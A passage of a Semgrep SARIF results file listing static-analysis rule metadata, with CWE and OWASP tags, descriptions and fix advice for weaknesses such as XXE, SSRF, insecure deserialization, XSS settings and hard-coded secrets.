[https://www.projectatomic.io/blog/2016/03/dwalsh_selinux_containers/](https://www.projectatomic.io/blog/2016/03/dwalsh_selinux_containers/)\n - [https://docs.docker.com/engine/reference/run/#security-configuration](https://docs.docker.com/engine/reference/run/#security-configuration)\n","text":"Service '$SERVICE' is explicitly disabling SELinux separation. This runs the service as an unconfined type. Remove 'label:disable' to prevent this."},"helpUri":"https://semgrep.dev/r/yaml.docker-compose.security.selinux-separation-disabled.selinux-separation-disabled","id":"yaml.docker-compose.security.selinux-separation-disabled.selinux-separation-disabled","name":"yaml.docker-compose.security.selinux-separation-disabled.selinux-separation-disabled","properties":{"precision":"very-high","tags":["CWE-284: Improper Access Control","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: yaml.docker-compose.security.selinux-separation-disabled.selinux-separation-disabled"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Overwriting `transformLinkUri` or `transformImageUri` to something insecure, or turning `allowDangerousHtml` on, or turning `escapeHtml` off, will open the code up to XSS vectors."},"help":{"markdown":"Overwriting `transformLinkUri` or `transformImageUri` to something insecure, or turning `allowDangerousHtml` on, or turning `escapeHtml` off, will open the code up to XSS vectors.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/typescript.react.security.react-markdown-insecure-html.react-markdown-insecure-html)\n - [https://www.npmjs.com/package/react-markdown#security](https://www.npmjs.com/package/react-markdown#security)\n","text":"Overwriting `transformLinkUri` or `transformImageUri` to something insecure, or turning `allowDangerousHtml` on, or turning `escapeHtml` off, will open the code up to XSS vectors."},"helpUri":"https://semgrep.dev/r/typescript.react.security.react-markdown-insecure-html.react-markdown-insecure-html","id":"typescript.react.security.react-markdown-insecure-html.react-markdown-insecure-html","name":"typescript.react.security.react-markdown-insecure-html.react-markdown-insecure-html","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: typescript.react.security.react-markdown-insecure-html.react-markdown-insecure-html"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Outlook Team detected"},"help":{"markdown":"Outlook Team detected\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.secrets.security.detected-outlook-team.detected-outlook-team)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"Outlook Team detected"},"helpUri":"https://semgrep.dev/r/generic.secrets.security.detected-outlook-team.detected-outlook-team","id":"generic.secrets.security.detected-outlook-team.detected-outlook-team","name":"generic.secrets.security.detected-outlook-team.detected-outlook-team","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","LOW CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: generic.secrets.security.detected-outlook-team.detected-outlook-team"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Found user controlled content in `run_string`. This is dangerous because it allows a malicious actor to run arbitrary Python code."},"help":{"markdown":"Found user controlled content in `run_string`. This is dangerous because it allows a malicious actor to run arbitrary Python code.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.dangerous-subinterpreters-run-string.dangerous-subinterpreters-run-string)\n - [https://bugs.python.org/issue43472](https://bugs.python.org/issue43472)\n - [https://semgrep.dev/docs/cheat-sheets/python-command-injection/](https://semgrep.dev/docs/cheat-sheets/python-command-injection/)\n","text":"Found user controlled content in `run_string`. This is dangerous because it allows a malicious actor to run arbitrary Python code."},"helpUri":"https://semgrep.dev/r/python.lang.security.dangerous-subinterpreters-run-string.dangerous-subinterpreters-run-string","id":"python.lang.security.dangerous-subinterpreters-run-string.dangerous-subinterpreters-run-string","name":"python.lang.security.dangerous-subinterpreters-run-string.dangerous-subinterpreters-run-string","properties":{"precision":"very-high","tags":["CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.dangerous-subinterpreters-run-string.dangerous-subinterpreters-run-string"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.lang.hardcoded.headers.hardcoded-github-token.hardcoded-github-token)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/javascript.lang.hardcoded.headers.hardcoded-github-token.hardcoded-github-token","id":"javascript.lang.hardcoded.headers.hardcoded-github-token.hardcoded-github-token","name":"javascript.lang.hardcoded.headers.hardcoded-github-token.hardcoded-github-token","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.lang.hardcoded.headers.hardcoded-github-token.hardcoded-github-token"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The preceding call to `$SOURCE` can return a negative value when an error is encountered. This can lead to an out-of-bounds array access and possible memory corruption."},"help":{"markdown":"The preceding call to `$SOURCE` can return a negative value when an error is encountered. This can lead to an out-of-bounds array access and possible memory corruption.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/cpp.lang.security.memory.negative-return-value-array-index.negative-return-value-array-index)\n - [https://cwe.mitre.org/data/definitions/787.html](https://cwe.mitre.org/data/definitions/787.html)\n","text":"The preceding call to `$SOURCE` can return a negative value when an error is encountered. This can lead to an out-of-bounds array access and possible memory corruption."},"helpUri":"https://semgrep.dev/r/cpp.lang.security.memory.negative-return-value-array-index.negative-return-value-array-index","id":"cpp.lang.security.memory.negative-return-value-array-index.negative-return-value-array-index","name":"cpp.lang.security.memory.negative-return-value-array-index.negative-return-value-array-index","properties":{"precision":"very-high","tags":["CWE-787: Out-of-bounds Write","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: cpp.lang.security.memory.negative-return-value-array-index.negative-return-value-array-index"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"DOCTYPE declarations are enabled for this DocumentBuilderFactory. This is vulnerable to XML external entity attacks. Disable this by setting the feature \"http://apache.org/xml/features/disallow-doctype-decl\" to true. Alternatively, allow DOCTYPE declarations and only prohibit external entities declarations. This can be done by setting the features \"http://xml.org/sax/features/external-general-entities\" and \"http://xml.org/sax/features/external-parameter-entities\" to false."},"help":{"markdown":"DOCTYPE declarations are enabled for this DocumentBuilderFactory. This is vulnerable to XML external entity attacks. Disable this by setting the feature \"http://apache.org/xml/features/disallow-doctype-decl\" to true. Alternatively, allow DOCTYPE declarations and only prohibit external entities declarations. This can be done by setting the features \"http://xml.org/sax/features/external-general-entities\" and \"http://xml.org/sax/features/external-parameter-entities\" to false.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.xxe.documentbuilderfactory-disallow-doctype-decl-missing.documentbuilderfactory-disallow-doctype-decl-missing)\n - [https://semgrep.dev/blog/2022/xml-security-in-java](https://semgrep.dev/blog/2022/xml-security-in-java)\n - [https://semgrep.dev/docs/cheat-sheets/java-xxe/](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n - [https://blog.sonarsource.com/secure-xml-processor](https://blog.sonarsource.com/secure-xml-processor)\n - [https://xerces.apache.org/xerces2-j/features.html](https://xerces.apache.org/xerces2-j/features.html)\n","text":"DOCTYPE declarations are enabled for this DocumentBuilderFactory. This is vulnerable to XML external entity attacks. Disable this by setting the feature \"http://apache.org/xml/features/disallow-doctype-decl\" to true. Alternatively, allow DOCTYPE declarations and only prohibit external entities declarations. This can be done by setting the features \"http://xml.org/sax/features/external-general-entities\" and \"http://xml.org/sax/features/external-parameter-entities\" to false."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.xxe.documentbuilderfactory-disallow-doctype-decl-missing.documentbuilderfactory-disallow-doctype-decl-missing","id":"java.lang.security.audit.xxe.documentbuilderfactory-disallow-doctype-decl-missing.documentbuilderfactory-disallow-doctype-decl-missing","name":"java.lang.security.audit.xxe.documentbuilderfactory-disallow-doctype-decl-missing.documentbuilderfactory-disallow-doctype-decl-missing","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","HIGH CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.xxe.documentbuilderfactory-disallow-doctype-decl-missing.documentbuilderfactory-disallow-doctype-decl-missing"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Because portions of the logging configuration are passed through eval(), use of this function may open its users to a security risk. While the function only binds to a socket on localhost, and so does not accept connections from remote machines, there are scenarios where untrusted code could be run under the account of the process which calls listen(). To avoid this happening, use the `verify()` argument to `listen()` to prevent unrecognized configurations."},"help":{"markdown":"Because portions of the logging configuration are passed through eval(), use of this function may open its users to a security risk. While the function only binds to a socket on localhost, and so does not accept connections from remote machines, there are scenarios where untrusted code could be run under the account of the process which calls listen(). To avoid this happening, use the `verify()` argument to `listen()` to prevent unrecognized configurations.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.audit.logging.listeneval.listen-eval)\n - [https://docs.python.org/3/library/logging.config.html?highlight=security#logging.config.listen](https://docs.python.org/3/library/logging.config.html?highlight=security#logging.config.listen)\n","text":"Because portions of the logging configuration are passed through eval(), use of this function may open its users to a security risk. While the function only binds to a socket on localhost, and so does not accept connections from remote machines, there are scenarios where untrusted code could be run under the account of the process which calls listen(). To avoid this happening, use the `verify()` argument to `listen()` to prevent unrecognized configurations."},"helpUri":"https://semgrep.dev/r/python.lang.security.audit.logging.listeneval.listen-eval","id":"python.lang.security.audit.logging.listeneval.listen-eval","name":"python.lang.security.audit.logging.listeneval.listen-eval","properties":{"precision":"very-high","tags":["CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.audit.logging.listeneval.listen-eval"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Avoid using `cPickle`, which is known to lead to code execution vulnerabilities. When unpickling, the serialized data could be manipulated to run arbitrary code. Instead, consider serializing the relevant data as JSON or a similar text-based serialization format."},"help":{"markdown":"Avoid using `cPickle`, which is known to lead to code execution vulnerabilities. When unpickling, the serialized data could be manipulated to run arbitrary code. Instead, consider serializing the relevant data as JSON or a similar text-based serialization format.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.deserialization.pickle.avoid-cPickle)\n - [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n","text":"Avoid using `cPickle`, which is known to lead to code execution vulnerabilities. When unpickling, the serialized data could be manipulated to run arbitrary code. Instead, consider serializing the relevant data as JSON or a similar text-based serialization format."},"helpUri":"https://semgrep.dev/r/python.lang.security.deserialization.pickle.avoid-cPickle","id":"python.lang.security.deserialization.pickle.avoid-cPickle","name":"python.lang.security.deserialization.pickle.avoid-cPickle","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","LOW CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.deserialization.pickle.avoid-cPickle"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected use of xmlrpc. xmlrpc is not inherently safe from vulnerabilities. Use defusedxml.xmlrpc instead."},"help":{"markdown":"Detected use of xmlrpc. xmlrpc is not inherently safe from vulnerabilities. Use defusedxml.xmlrpc instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.use-defused-xmlrpc.use-defused-xmlrpc)\n - [https://pypi.org/project/defusedxml/](https://pypi.org/project/defusedxml/)\n - [https://docs.python.org/3/library/xml.html#xml-vulnerabilities](https://docs.python.org/3/library/xml.html#xml-vulnerabilities)\n","text":"Detected use of xmlrpc. xmlrpc is not inherently safe from vulnerabilities. Use defusedxml.xmlrpc instead."},"helpUri":"https://semgrep.dev/r/python.lang.security.use-defused-xmlrpc.use-defused-xmlrpc","id":"python.lang.security.use-defused-xmlrpc.use-defused-xmlrpc","name":"python.lang.security.use-defused-xmlrpc.use-defused-xmlrpc","properties":{"precision":"very-high","tags":["CWE-776: Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')","LOW CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.use-defused-xmlrpc.use-defused-xmlrpc"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.spring.security.tainted-ssrf-spring-format.tainted-ssrf-spring-format)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/java.spring.security.tainted-ssrf-spring-format.tainted-ssrf-spring-format","id":"java.spring.security.tainted-ssrf-spring-format.tainted-ssrf-spring-format","name":"java.spring.security.tainted-ssrf-spring-format.tainted-ssrf-spring-format","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","HIGH CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: java.spring.security.tainted-ssrf-spring-format.tainted-ssrf-spring-format"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Hardcoded JWT secret or private key is used. This is a Insufficiently Protected Credentials weakness: https://cwe.mitre.org/data/definitions/522.html Consider using an appropriate security mechanism to protect the credentials (e.g. keeping secrets in environment variables)"},"help":{"markdown":"Hardcoded JWT secret or private key is used. This is a Insufficiently Protected Credentials weakness: https://cwe.mitre.org/data/definitions/522.html Consider using an appropriate security mechanism to protect the credentials (e.g. keeping secrets in environment variables)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.jwt.security.jwt-hardcode.jwt-python-hardcoded-secret)\n - [https://semgrep.dev/blog/2020/hardcoded-secrets-unverified-tokens-and-other-common-jwt-mistakes/](https://semgrep.dev/blog/2020/hardcoded-secrets-unverified-tokens-and-other-common-jwt-mistakes/)\n","text":"Hardcoded JWT secret or private key is used. This is a Insufficiently Protected Credentials weakness: https://cwe.mitre.org/data/definitions/522.html Consider using an appropriate security mechanism to protect the credentials (e.g. keeping secrets in environment variables)"},"helpUri":"https://semgrep.dev/r/python.jwt.security.jwt-hardcode.jwt-python-hardcoded-secret","id":"python.jwt.security.jwt-hardcode.jwt-python-hardcoded-secret","name":"python.jwt.security.jwt-hardcode.jwt-python-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-522: Insufficiently Protected Credentials","HIGH CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: python.jwt.security.jwt-hardcode.jwt-python-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Do not use `math/rand`. Use `crypto/rand` instead."},"help":{"markdown":"Do not use `math/rand`. Use `crypto/rand` instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.lang.security.audit.crypto.math_random.math-random-used)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#secure-random-number-generation](https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#secure-random-number-generation)\n","text":"Do not use `math/rand`. Use `crypto/rand` instead."},"helpUri":"https://semgrep.dev/r/go.lang.security.audit.crypto.math_random.math-random-used","id":"go.lang.security.audit.crypto.math_random.math-random-used","name":"go.lang.security.audit.crypto.math_random.math-random-used","properties":{"precision":"very-high","tags":["CWE-338: Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG)","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","security"]},"shortDescription":{"text":"Semgrep Finding: go.lang.security.audit.crypto.math_random.math-random-used"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"AWS Secret Access Key detected"},"help":{"markdown":"AWS Secret Access Key detected\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.secrets.security.detected-aws-secret-access-key.detected-aws-secret-access-key)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"AWS Secret Access Key detected"},"helpUri":"https://semgrep.dev/r/generic.secrets.security.detected-aws-secret-access-key.detected-aws-secret-access-key","id":"generic.secrets.security.detected-aws-secret-access-key.detected-aws-secret-access-key","name":"generic.secrets.security.detected-aws-secret-access-key.detected-aws-secret-access-key","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","LOW CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: generic.secrets.security.detected-aws-secret-access-key.detected-aws-secret-access-key"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Use the latest version of HTTP to ensure you are benefiting from security fixes. Add `http2_enabled = true` to your appservice resource block"},"help":{"markdown":"Use the latest version of HTTP to ensure you are benefiting from security fixes. Add `http2_enabled = true` to your appservice resource block\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.azure.security.appservice.appservice-enable-http2.appservice-enable-http2)\n - [https://registry.terraform.io/providers/hashicorp/azurerm/latest/docs/resources/app_service#http2_enabled](https://registry.terraform.io/providers/hashicorp/azurerm/latest/docs/resources/app_service#http2_enabled)\n","text":"Use the latest version of HTTP to ensure you are benefiting from security fixes. Add `http2_enabled = true` to your appservice resource block"},"helpUri":"https://semgrep.dev/r/terraform.azure.security.appservice.appservice-enable-http2.appservice-enable-http2","id":"terraform.azure.security.appservice.appservice-enable-http2.appservice-enable-http2","name":"terraform.azure.security.appservice.appservice-enable-http2.appservice-enable-http2","properties":{"precision":"very-high","tags":["CWE-444: Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')","MEDIUM CONFIDENCE","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.azure.security.appservice.appservice-enable-http2.appservice-enable-http2"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected non-literal calls to Deno.run(). This could lead to a command injection vulnerability."},"help":{"markdown":"Detected non-literal calls to Deno.run(). This could lead to a command injection vulnerability.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.deno.security.audit.deno-dangerous-run.deno-dangerous-run)\n - [https://deno.land/manual/examples/subprocess#simple-example](https://deno.land/manual/examples/subprocess#simple-example)\n","text":"Detected non-literal calls to Deno.run(). This could lead to a command injection vulnerability."},"helpUri":"https://semgrep.dev/r/javascript.deno.security.audit.deno-dangerous-run.deno-dangerous-run","id":"javascript.deno.security.audit.deno-dangerous-run.deno-dangerous-run","name":"javascript.deno.security.audit.deno-dangerous-run.deno-dangerous-run","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.deno.security.audit.deno-dangerous-run.deno-dangerous-run"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Detected a logger that logs user input without properly neutralizing the output. The log message could contain characters like ` ` and ` ` and cause an attacker to forge log entries or include malicious content into the logs. Use proper input validation and/or output encoding to prevent log entries from being forged."},"help":{"markdown":"Detected a logger that logs user input without properly neutralizing the output. The log message could contain characters like ` ` and ` ` and cause an attacker to forge log entries or include malicious content into the logs. Use proper input validation and/or output encoding to prevent log entries from being forged.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.log.tainted-log-injection-stdlib-django.tainted-log-injection-stdlib-django)\n - [https://cwe.mitre.org/data/definitions/117.html](https://cwe.mitre.org/data/definitions/117.html)\n - [https://owasp.org/Top10/A09_2021-Security_Logging_and_Monitoring_Failures](https://owasp.org/Top10/A09_2021-Security_Logging_and_Monitoring_Failures)\n","text":"Detected a logger that logs user input without properly neutralizing the output. The log message could contain characters like ` ` and ` ` and cause an attacker to forge log entries or include malicious content into the logs. Use proper input validation and/or output encoding to prevent log entries from being forged."},"helpUri":"https://semgrep.dev/r/python.django.log.tainted-log-injection-stdlib-django.tainted-log-injection-stdlib-django","id":"python.django.log.tainted-log-injection-stdlib-django.tainted-log-injection-stdlib-django","name":"python.django.log.tainted-log-injection-stdlib-django.tainted-log-injection-stdlib-django","properties":{"precision":"very-high","tags":["CWE-117: Improper Output Neutralization for Logs","HIGH CONFIDENCE","OWASP-A09:2021 - Security Logging and Monitoring Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.log.tainted-log-injection-stdlib-django.tainted-log-injection-stdlib-django"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Detected a cookie where the `HttpOnly` flag is either missing or disabled. The `HttpOnly` cookie flag instructs the browser to forbid client-side JavaScript to read the cookie. If JavaScript interaction is required, you can ignore this finding. However, set the `HttpOnly` flag to `true` in all other cases. If this wasn't intentional, it's recommended to set the HttpOnly flag to true so the cookie will not be accessible through client-side scripts. This approach ensures session cookies are secure by default. It is also possible to use the flask-talisman extension to enforce a secure configuration."},"help":{"markdown":"Detected a cookie where the `HttpOnly` flag is either missing or disabled. The `HttpOnly` cookie flag instructs the browser to forbid client-side JavaScript to read the cookie. If JavaScript interaction is required, you can ignore this finding. However, set the `HttpOnly` flag to `true` in all other cases. If this wasn't intentional, it's recommended to set the HttpOnly flag to true so the cookie will not be accessible through client-side scripts. This approach ensures session cookies are secure by default. It is also possible to use the flask-talisman extension to enforce a secure configuration.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.web.flask-cookie-app-config-httponly-false.flask-cookie-app-config-httponly-false)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n","text":"Detected a cookie where the `HttpOnly` flag is either missing or disabled. The `HttpOnly` cookie flag instructs the browser to forbid client-side JavaScript to read the cookie. If JavaScript interaction is required, you can ignore this finding. However, set the `HttpOnly` flag to `true` in all other cases. If this wasn't intentional, it's recommended to set the HttpOnly flag to true so the cookie will not be accessible through client-side scripts. This approach ensures session cookies are secure by default. It is also possible to use the flask-talisman extension to enforce a secure configuration."},"helpUri":"https://semgrep.dev/r/python.flask.web.flask-cookie-app-config-httponly-false.flask-cookie-app-config-httponly-false","id":"python.flask.web.flask-cookie-app-config-httponly-false.flask-cookie-app-config-httponly-false","name":"python.flask.web.flask-cookie-app-config-httponly-false.flask-cookie-app-config-httponly-false","properties":{"precision":"very-high","tags":["CWE-1004: Sensitive Cookie Without 'HttpOnly' Flag","HIGH CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.web.flask-cookie-app-config-httponly-false.flask-cookie-app-config-httponly-false"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Directory listing/indexing is enabled, which may lead to disclosure of sensitive directories and files. It is recommended to disable directory listing unless it is a public resource. If you need directory listing, ensure that sensitive files are inaccessible when querying the resource."},"help":{"markdown":"Directory listing/indexing is enabled, which may lead to disclosure of sensitive directories and files. It is recommended to disable directory listing unless it is a public resource. If you need directory listing, ensure that sensitive files are inaccessible when querying the resource.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.security.audit.express-check-directory-listing.express-check-directory-listing)\n - [https://www.npmjs.com/package/serve-index](https://www.npmjs.com/package/serve-index)\n - [https://www.acunetix.com/blog/articles/directory-listing-information-disclosure/](https://www.acunetix.com/blog/articles/directory-listing-information-disclosure/)\n","text":"Directory listing/indexing is enabled, which may lead to disclosure of sensitive directories and files. It is recommended to disable directory listing unless it is a public resource. If you need directory listing, ensure that sensitive files are inaccessible when querying the resource."},"helpUri":"https://semgrep.dev/r/javascript.express.security.audit.express-check-directory-listing.express-check-directory-listing","id":"javascript.express.security.audit.express-check-directory-listing.express-check-directory-listing","name":"javascript.express.security.audit.express-check-directory-listing.express-check-directory-listing","properties":{"precision":"very-high","tags":["CWE-548: Exposure of Information Through Directory Listing","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A06:2017 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.security.audit.express-check-directory-listing.express-check-directory-listing"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_pickle()` function uses `pickle` for object deserialization and should not be used with untrusted data."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_pickle()` function uses `pickle` for object deserialization and should not be used with untrusted data.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.deserialization.tainted-pandas-pickle-fastapi.tainted-pandas-pickle-fastapi)\n - [https://davidhamann.de/2020/04/05/exploiting-python-pickle/](https://davidhamann.de/2020/04/05/exploiting-python-pickle/)\n - [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n - [https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html](https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://pandas.pydata.org/docs/reference/api/pandas.read_pickle.html](https://pandas.pydata.org/docs/reference/api/pandas.read_pickle.html)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n - [https://redfoxsec.com/blog/insecure-deserialization-in-python/](https://redfoxsec.com/blog/insecure-deserialization-in-python/)\n - [https://www.exploit-db.com/exploits/49585](https://www.exploit-db.com/exploits/49585)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_pickle()` function uses `pickle` for object deserialization and should not be used with untrusted data."},"helpUri":"https://semgrep.dev/r/python.fastapi.deserialization.tainted-pandas-pickle-fastapi.tainted-pandas-pickle-fastapi","id":"python.fastapi.deserialization.tainted-pandas-pickle-fastapi.tainted-pandas-pickle-fastapi","name":"python.fastapi.deserialization.tainted-pandas-pickle-fastapi.tainted-pandas-pickle-fastapi","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure 